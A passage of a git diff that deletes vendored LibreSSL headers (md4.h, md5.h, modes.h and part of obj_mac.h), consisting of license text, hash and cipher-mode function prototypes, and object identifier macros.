- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stddef.h>
-
-#ifndef HEADER_MD4_H
-#define HEADER_MD4_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_MD4
-#error MD4 is disabled.
-#endif
-
-/*
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- * ! MD4_LONG has to be at least 32 bits wide.                     !
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- */
-
-#define MD4_LONG unsigned int
-
-#define MD4_CBLOCK	64
-#define MD4_LBLOCK	(MD4_CBLOCK/4)
-#define MD4_DIGEST_LENGTH 16
-
-typedef struct MD4state_st
-	{
-	MD4_LONG A,B,C,D;
-	MD4_LONG Nl,Nh;
-	MD4_LONG data[MD4_LBLOCK];
-	unsigned int num;
-	} MD4_CTX;
-
-int MD4_Init(MD4_CTX *c);
-int MD4_Update(MD4_CTX *c, const void *data, size_t len);
-int MD4_Final(unsigned char *md, MD4_CTX *c);
-unsigned char *MD4(const unsigned char *d, size_t n, unsigned char *md);
-void MD4_Transform(MD4_CTX *c, const unsigned char *b);
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/md5.h b/thirdparty/libressl/include/openssl/md5.h
deleted file mode 100644
index e2c511c..0000000
--- a/thirdparty/libressl/include/openssl/md5.h
+++ /dev/null
@@ -1,108 +0,0 @@
-/* $OpenBSD: md5.h,v 1.20 2014/10/20 13:06:54 bcook Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stddef.h>
-
-#ifndef HEADER_MD5_H
-#define HEADER_MD5_H
-#if !defined(HAVE_ATTRIBUTE__BOUNDED__) && !defined(__OpenBSD__)
-#define __bounded__(x, y, z)
-#endif
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_MD5
-#error MD5 is disabled.
-#endif
-
-/*
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- * ! MD5_LONG has to be at least 32 bits wide.                     !
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- */
-
-#define MD5_LONG unsigned int
-
-#define MD5_CBLOCK	64
-#define MD5_LBLOCK	(MD5_CBLOCK/4)
-#define MD5_DIGEST_LENGTH 16
-
-typedef struct MD5state_st
-	{
-	MD5_LONG A,B,C,D;
-	MD5_LONG Nl,Nh;
-	MD5_LONG data[MD5_LBLOCK];
-	unsigned int num;
-	} MD5_CTX;
-
-int MD5_Init(MD5_CTX *c);
-int MD5_Update(MD5_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int MD5_Final(unsigned char *md, MD5_CTX *c);
-unsigned char *MD5(const unsigned char *d, size_t n, unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-void MD5_Transform(MD5_CTX *c, const unsigned char *b);
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/modes.h b/thirdparty/libressl/include/openssl/modes.h
deleted file mode 100644
index a532cb3..0000000
--- a/thirdparty/libressl/include/openssl/modes.h
+++ /dev/null
@@ -1,136 +0,0 @@
-/* $OpenBSD: modes.h,v 1.2 2014/06/12 15:49:30 deraadt Exp $ */
-/* ====================================================================
- * Copyright (c) 2008 The OpenSSL Project. All rights reserved.
- *
- * Rights for redistribution and usage in source and binary
- * forms are granted according to the OpenSSL license.
- */
-
-#include <stddef.h>
-
-typedef void (*block128_f)(const unsigned char in[16],
-			unsigned char out[16],
-			const void *key);
-
-typedef void (*cbc128_f)(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], int enc);
-
-typedef void (*ctr128_f)(const unsigned char *in, unsigned char *out,
-			size_t blocks, const void *key,
-			const unsigned char ivec[16]);
-
-typedef void (*ccm128_f)(const unsigned char *in, unsigned char *out,
-			size_t blocks, const void *key,
-			const unsigned char ivec[16],unsigned char cmac[16]);
-
-void CRYPTO_cbc128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-void CRYPTO_cbc128_decrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-
-void CRYPTO_ctr128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], unsigned char ecount_buf[16],
-			unsigned int *num, block128_f block);
-
-void CRYPTO_ctr128_encrypt_ctr32(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], unsigned char ecount_buf[16],
-			unsigned int *num, ctr128_f ctr);
-
-void CRYPTO_ofb128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], int *num,
-			block128_f block);
-
-void CRYPTO_cfb128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], int *num,
-			int enc, block128_f block);
-void CRYPTO_cfb128_8_encrypt(const unsigned char *in, unsigned char *out,
-			size_t length, const void *key,
-			unsigned char ivec[16], int *num,
-			int enc, block128_f block);
-void CRYPTO_cfb128_1_encrypt(const unsigned char *in, unsigned char *out,
-			size_t bits, const void *key,
-			unsigned char ivec[16], int *num,
-			int enc, block128_f block);
-
-size_t CRYPTO_cts128_encrypt_block(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-size_t CRYPTO_cts128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], cbc128_f cbc);
-size_t CRYPTO_cts128_decrypt_block(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-size_t CRYPTO_cts128_decrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], cbc128_f cbc);
-
-size_t CRYPTO_nistcts128_encrypt_block(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-size_t CRYPTO_nistcts128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], cbc128_f cbc);
-size_t CRYPTO_nistcts128_decrypt_block(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-size_t CRYPTO_nistcts128_decrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], cbc128_f cbc);
-
-typedef struct gcm128_context GCM128_CONTEXT;
-
-GCM128_CONTEXT *CRYPTO_gcm128_new(void *key, block128_f block);
-void CRYPTO_gcm128_init(GCM128_CONTEXT *ctx,void *key,block128_f block);
-void CRYPTO_gcm128_setiv(GCM128_CONTEXT *ctx, const unsigned char *iv,
-			size_t len);
-int CRYPTO_gcm128_aad(GCM128_CONTEXT *ctx, const unsigned char *aad,
-			size_t len);
-int CRYPTO_gcm128_encrypt(GCM128_CONTEXT *ctx,
-			const unsigned char *in, unsigned char *out,
-			size_t len);
-int CRYPTO_gcm128_decrypt(GCM128_CONTEXT *ctx,
-			const unsigned char *in, unsigned char *out,
-			size_t len);
-int CRYPTO_gcm128_encrypt_ctr32(GCM128_CONTEXT *ctx,
-			const unsigned char *in, unsigned char *out,
-			size_t len, ctr128_f stream);
-int CRYPTO_gcm128_decrypt_ctr32(GCM128_CONTEXT *ctx,
-			const unsigned char *in, unsigned char *out,
-			size_t len, ctr128_f stream);
-int CRYPTO_gcm128_finish(GCM128_CONTEXT *ctx,const unsigned char *tag,
-			size_t len);
-void CRYPTO_gcm128_tag(GCM128_CONTEXT *ctx, unsigned char *tag, size_t len);
-void CRYPTO_gcm128_release(GCM128_CONTEXT *ctx);
-
-typedef struct ccm128_context CCM128_CONTEXT;
-
-void CRYPTO_ccm128_init(CCM128_CONTEXT *ctx,
-	unsigned int M, unsigned int L, void *key,block128_f block);
-int CRYPTO_ccm128_setiv(CCM128_CONTEXT *ctx,
-	const unsigned char *nonce, size_t nlen, size_t mlen);
-void CRYPTO_ccm128_aad(CCM128_CONTEXT *ctx,
-	const unsigned char *aad, size_t alen);
-int CRYPTO_ccm128_encrypt(CCM128_CONTEXT *ctx,
-	const unsigned char *inp, unsigned char *out, size_t len);
-int CRYPTO_ccm128_decrypt(CCM128_CONTEXT *ctx,
-	const unsigned char *inp, unsigned char *out, size_t len);
-int CRYPTO_ccm128_encrypt_ccm64(CCM128_CONTEXT *ctx,
-	const unsigned char *inp, unsigned char *out, size_t len,
-	ccm128_f stream);
-int CRYPTO_ccm128_decrypt_ccm64(CCM128_CONTEXT *ctx,
-	const unsigned char *inp, unsigned char *out, size_t len,
-	ccm128_f stream);
-size_t CRYPTO_ccm128_tag(CCM128_CONTEXT *ctx, unsigned char *tag, size_t len);
-
-typedef struct xts128_context XTS128_CONTEXT;
-
-int CRYPTO_xts128_encrypt(const XTS128_CONTEXT *ctx, const unsigned char iv[16],
-	const unsigned char *inp, unsigned char *out, size_t len, int enc);
diff --git a/thirdparty/libressl/include/openssl/obj_mac.h b/thirdparty/libressl/include/openssl/obj_mac.h
deleted file mode 100644
index 753ef10..0000000
--- a/thirdparty/libressl/include/openssl/obj_mac.h
+++ /dev/null
@@ -1,4194 +0,0 @@
-/* crypto/objects/obj_mac.h */
-
-/* THIS FILE IS GENERATED FROM objects.txt by objects.pl via the
- * following command:
- * perl objects.pl objects.txt obj_mac.num obj_mac.h
- */
-
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#define SN_undef			"UNDEF"
-#define LN_undef			"undefined"
-#define NID_undef			0
-#define OBJ_undef			0L
-
-#define SN_itu_t		"ITU-T"
-#define LN_itu_t		"itu-t"
-#define NID_itu_t		645
-#define OBJ_itu_t		0L
-
-#define NID_ccitt		404
-#define OBJ_ccitt		OBJ_itu_t
-
-#define SN_iso		"ISO"
-#define LN_iso		"iso"
-#define NID_iso		181
-#define OBJ_iso		1L
-
-#define SN_joint_iso_itu_t		"JOINT-ISO-ITU-T"
-#define LN_joint_iso_itu_t		"joint-iso-itu-t"
-#define NID_joint_iso_itu_t		646
-#define OBJ_joint_iso_itu_t		2L
-
-#define NID_joint_iso_ccitt		393
-#define OBJ_joint_iso_ccitt		OBJ_joint_iso_itu_t
-
-#define SN_member_body		"member-body"
-#define LN_member_body		"ISO Member Body"
-#define NID_member_body		182
-#define OBJ_member_body		OBJ_iso,2L
-
-#define SN_identified_organization		"identified-organization"
-#define NID_identified_organization		676
-#define OBJ_identified_organization		OBJ_iso,3L
-
-#define SN_hmac_md5		"HMAC-MD5"
-#define LN_hmac_md5		"hmac-md5"
-#define NID_hmac_md5		780
-#define OBJ_hmac_md5		OBJ_identified_organization,6L,1L,5L,5L,8L,1L,1L
-
-#define SN_hmac_sha1		"HMAC-SHA1"
-#define LN_hmac_sha1		"hmac-sha1"
-#define NID_hmac_sha1		781
-#define OBJ_hmac_sha1		OBJ_identified_organization,6L,1L,5L,5L,8L,1L,2L
-
-#define SN_certicom_arc		"certicom-arc"
-#define NID_certicom_arc		677
-#define OBJ_certicom_arc		OBJ_identified_organization,132L
-
-#define SN_international_organizations		"international-organizations"
-#define LN_international_organizations		"International Organizations"
-#define NID_international_organizations		647
-#define OBJ_international_organizations		OBJ_joint_iso_itu_t,23L
-
-#define SN_wap		"wap"
-#define NID_wap		678
-#define OBJ_wap		OBJ_international_organizations,43L
-
-#define SN_wap_wsg		"wap-wsg"
-#define NID_wap_wsg		679
-#define OBJ_wap_wsg		OBJ_wap,1L
-
-#define SN_selected_attribute_types		"selected-attribute-types"
-#define LN_selected_attribute_types		"Selected Attribute Types"
-#define NID_selected_attribute_types		394
-#define OBJ_selected_attribute_types		OBJ_joint_iso_itu_t,5L,1L,5L
-
-#define SN_clearance		"clearance"
-#define NID_clearance		395
-#define OBJ_clearance		OBJ_selected_attribute_types,55L
-
-#define SN_ISO_US		"ISO-US"
-#define LN_ISO_US		"ISO US Member Body"
-#define NID_ISO_US		183
-#define OBJ_ISO_US		OBJ_member_body,840L
-
-#define SN_X9_57		"X9-57"
-#define LN_X9_57		"X9.57"
-#define NID_X9_57		184
-#define OBJ_X9_57		OBJ_ISO_US,10040L
-
-#define SN_X9cm		"X9cm"
-#define LN_X9cm		"X9.57 CM ?"
-#define NID_X9cm		185
-#define OBJ_X9cm		OBJ_X9_57,4L
-
-#define SN_dsa		"DSA"
-#define LN_dsa		"dsaEncryption"
-#define NID_dsa		116
-#define OBJ_dsa		OBJ_X9cm,1L
-
-#define SN_dsaWithSHA1		"DSA-SHA1"
-#define LN_dsaWithSHA1		"dsaWithSHA1"
-#define NID_dsaWithSHA1		113
-#define OBJ_dsaWithSHA1		OBJ_X9cm,3L
-
-#define SN_ansi_X9_62		"ansi-X9-62"
-#define LN_ansi_X9_62		"ANSI X9.62"
-#define NID_ansi_X9_62		405
-#define OBJ_ansi_X9_62		OBJ_ISO_US,10045L
-
-#define OBJ_X9_62_id_fieldType		OBJ_ansi_X9_62,1L
-
-#define SN_X9_62_prime_field		"prime-field"
-#define NID_X9_62_prime_field		406
-#define OBJ_X9_62_prime_field		OBJ_X9_62_id_fieldType,1L
-
-#define SN_X9_62_characteristic_two_field		"characteristic-two-field"
-#define NID_X9_62_characteristic_two_field		407
-#define OBJ_X9_62_characteristic_two_field		OBJ_X9_62_id_fieldType,2L
-
-#define SN_X9_62_id_characteristic_two_basis		"id-characteristic-two-basis"
-#define NID_X9_62_id_characteristic_two_basis		680
-#define OBJ_X9_62_id_characteristic_two_basis		OBJ_X9_62_characteristic_two_field,3L
-
-#define SN_X9_62_onBasis		"onBasis"
-#define NID_X9_62_onBasis		681
-#define OBJ_X9_62_onBasis		OBJ_X9_62_id_characteristic_two_basis,1L
-
-#define SN_X9_62_tpBasis		"tpBasis"
-#define NID_X9_62_tpBasis		682
-#define OBJ_X9_62_tpBasis		OBJ_X9_62_id_characteristic_two_basis,2L
-
-#define SN_X9_62_ppBasis		"ppBasis"
-#define NID_X9_62_ppBasis		683
-#define OBJ_X9_62_ppBasis		OBJ_X9_62_id_characteristic_two_basis,3L
-
-#define OBJ_X9_62_id_publicKeyType		OBJ_ansi_X9_62,2L
-
-#define SN_X9_62_id_ecPublicKey		"id-ecPublicKey"
-#define NID_X9_62_id_ecPublicKey		408
-#define OBJ_X9_62_id_ecPublicKey		OBJ_X9_62_id_publicKeyType,1L
-
-#define OBJ_X9_62_ellipticCurve		OBJ_ansi_X9_62,3L
-
-#define OBJ_X9_62_c_TwoCurve		OBJ_X9_62_ellipticCurve,0L
-
-#define SN_X9_62_c2pnb163v1		"c2pnb163v1"
-#define NID_X9_62_c2pnb163v1		684
-#define OBJ_X9_62_c2pnb163v1		OBJ_X9_62_c_TwoCurve,1L
-
-#define SN_X9_62_c2pnb163v2		"c2pnb163v2"
-#define NID_X9_62_c2pnb163v2		685
-#define OBJ_X9_62_c2pnb163v2		OBJ_X9_62_c_TwoCurve,2L
-
-#define SN_X9_62_c2pnb163v3		"c2pnb163v3"
-#define NID_X9_62_c2pnb163v3		686
-#define OBJ_X9_62_c2pnb163v3		OBJ_X9_62_c_TwoCurve,3L
-
-#define SN_X9_62_c2pnb176v1		"c2pnb176v1"
-#define NID_X9_62_c2pnb176v1		687
-#define OBJ_X9_62_c2pnb176v1		OBJ_X9_62_c_TwoCurve,4L
-
-#define SN_X9_62_c2tnb191v1		"c2tnb191v1"
-#define NID_X9_62_c2tnb191v1		688
-#define OBJ_X9_62_c2tnb191v1		OBJ_X9_62_c_TwoCurve,5L
-
-#define SN_X9_62_c2tnb191v2		"c2tnb191v2"
-#define NID_X9_62_c2tnb191v2		689
-#define OBJ_X9_62_c2tnb191v2		OBJ_X9_62_c_TwoCurve,6L
-
-#define SN_X9_62_c2tnb191v3		"c2tnb191v3"
-#define NID_X9_62_c2tnb191v3		690
-#define OBJ_X9_62_c2tnb191v3		OBJ_X9_62_c_TwoCurve,7L
-
-#define SN_X9_62_c2onb191v4		"c2onb191v4"
-#define NID_X9_62_c2onb191v4		691
-#define OBJ_X9_62_c2onb191v4		OBJ_X9_62_c_TwoCurve,8L
-
-#define SN_X9_62_c2onb191v5		"c2onb191v5"
-#define NID_X9_62_c2onb191v5		692
-#define OBJ_X9_62_c2onb191v5		OBJ_X9_62_c_TwoCurve,9L
-
-#define SN_X9_62_c2pnb208w1		"c2pnb208w1"
-#define NID_X9_62_c2pnb208w1		693
-#define OBJ_X9_62_c2pnb208w1		OBJ_X9_62_c_TwoCurve,10L
-
-#define SN_X9_62_c2tnb239v1		"c2tnb239v1"
-#define NID_X9_62_c2tnb239v1		694
-#define OBJ_X9_62_c2tnb239v1		OBJ_X9_62_c_TwoCurve,11L
-
-#define SN_X9_62_c2tnb239v2		"c2tnb239v2"
-#define NID_X9_62_c2tnb239v2		695
-#define OBJ_X9_62_c2tnb239v2		OBJ_X9_62_c_TwoCurve,12L
-
-#define SN_X9_62_c2tnb239v3		"c2tnb239v3"
-#define NID_X9_62_c2tnb239v3		696
-#define OBJ_X9_62_c2tnb239v3		OBJ_X9_62_c_TwoCurve,13L
-
-#define SN_X9_62_c2onb239v4		"c2onb239v4"
-#define NID_X9_62_c2onb239v4		697
-#define OBJ_X9_62_c2onb239v4		OBJ_X9_62_c_TwoCurve,14L
-
-#define SN_X9_62_c2onb239v5		"c2onb239v5"
-#define NID_X9_62_c2onb239v5		698
-#define OBJ_X9_62_c2onb239v5		OBJ_X9_62_c_TwoCurve,15L
-
-#define SN_X9_62_c2pnb272w1		"c2pnb272w1"
-#define NID_X9_62_c2pnb272w1		699
-#define OBJ_X9_62_c2pnb272w1		OBJ_X9_62_c_TwoCurve,16L
-
-#define SN_X9_62_c2pnb304w1		"c2pnb304w1"
-#define NID_X9_62_c2pnb304w1		700
-#define OBJ_X9_62_c2pnb304w1		OBJ_X9_62_c_TwoCurve,17L
-
-#define SN_X9_62_c2tnb359v1		"c2tnb359v1"
-#define NID_X9_62_c2tnb359v1		701
-#define OBJ_X9_62_c2tnb359v1		OBJ_X9_62_c_TwoCurve,18L
-
-#define SN_X9_62_c2pnb368w1		"c2pnb368w1"
-#define NID_X9_62_c2pnb368w1		702
-#define OBJ_X9_62_c2pnb368w1		OBJ_X9_62_c_TwoCurve,19L
-
-#define SN_X9_62_c2tnb431r1		"c2tnb431r1"
-#define NID_X9_62_c2tnb431r1		703
-#define OBJ_X9_62_c2tnb431r1		OBJ_X9_62_c_TwoCurve,20L
-
-#define OBJ_X9_62_primeCurve		OBJ_X9_62_ellipticCurve,1L
-
-#define SN_X9_62_prime192v1		"prime192v1"
-#define NID_X9_62_prime192v1		409
-#define OBJ_X9_62_prime192v1		OBJ_X9_62_primeCurve,1L
-
-#define SN_X9_62_prime192v2		"prime192v2"
-#define NID_X9_62_prime192v2		410
-#define OBJ_X9_62_prime192v2		OBJ_X9_62_primeCurve,2L
-
-#define SN_X9_62_prime192v3		"prime192v3"
-#define NID_X9_62_prime192v3		411
-#define OBJ_X9_62_prime192v3		OBJ_X9_62_primeCurve,3L
-
-#define SN_X9_62_prime239v1		"prime239v1"
-#define NID_X9_62_prime239v1		412
-#define OBJ_X9_62_prime239v1		OBJ_X9_62_primeCurve,4L
-
-#define SN_X9_62_prime239v2		"prime239v2"
-#define NID_X9_62_prime239v2		413
-#define OBJ_X9_62_prime239v2		OBJ_X9_62_primeCurve,5L
-
-#define SN_X9_62_prime239v3		"prime239v3"
-#define NID_X9_62_prime239v3		414
-#define OBJ_X9_62_prime239v3		OBJ_X9_62_primeCurve,6L
-
-#define SN_X9_62_prime256v1		"prime256v1"
-#define NID_X9_62_prime256v1		415
-#define OBJ_X9_62_prime256v1		OBJ_X9_62_primeCurve,7L
-
-#define OBJ_X9_62_id_ecSigType		OBJ_ansi_X9_62,4L
-
-#define SN_ecdsa_with_SHA1		"ecdsa-with-SHA1"
-#define NID_ecdsa_with_SHA1		416
-#define OBJ_ecdsa_with_SHA1		OBJ_X9_62_id_ecSigType,1L
-
-#define SN_ecdsa_with_Recommended		"ecdsa-with-Recommended"
-#define NID_ecdsa_with_Recommended		791
-#define OBJ_ecdsa_with_Recommended		OBJ_X9_62_id_ecSigType,2L
-
-#define SN_ecdsa_with_Specified		"ecdsa-with-Specified"
-#define NID_ecdsa_with_Specified		792
-#define OBJ_ecdsa_with_Specified		OBJ_X9_62_id_ecSigType,3L
-
-#define SN_ecdsa_with_SHA224		"ecdsa-with-SHA224"
-#define NID_ecdsa_with_SHA224		793
-#define OBJ_ecdsa_with_SHA224		OBJ_ecdsa_with_Specified,1L
-
-#define SN_ecdsa_with_SHA256		"ecdsa-with-SHA256"
-#define NID_ecdsa_with_SHA256		794
-#define OBJ_ecdsa_with_SHA256		OBJ_ecdsa_with_Specified,2L
-
-#define SN_ecdsa_with_SHA384		"ecdsa-with-SHA384"
-#define NID_ecdsa_with_SHA384		795
-#define OBJ_ecdsa_with_SHA384		OBJ_ecdsa_with_Specified,3L
-
-#define SN_ecdsa_with_SHA512		"ecdsa-with-SHA512"
-#define NID_ecdsa_with_SHA512		796
-#define OBJ_ecdsa_with_SHA512		OBJ_ecdsa_with_Specified,4L
-
-#define OBJ_secg_ellipticCurve		OBJ_certicom_arc,0L
-
-#define SN_secp112r1		"secp112r1"
-#define NID_secp112r1		704
-#define OBJ_secp112r1		OBJ_secg_ellipticCurve,6L
-
-#define SN_secp112r2		"secp112r2"
-#define NID_secp112r2		705
-#define OBJ_secp112r2		OBJ_secg_ellipticCurve,7L
-
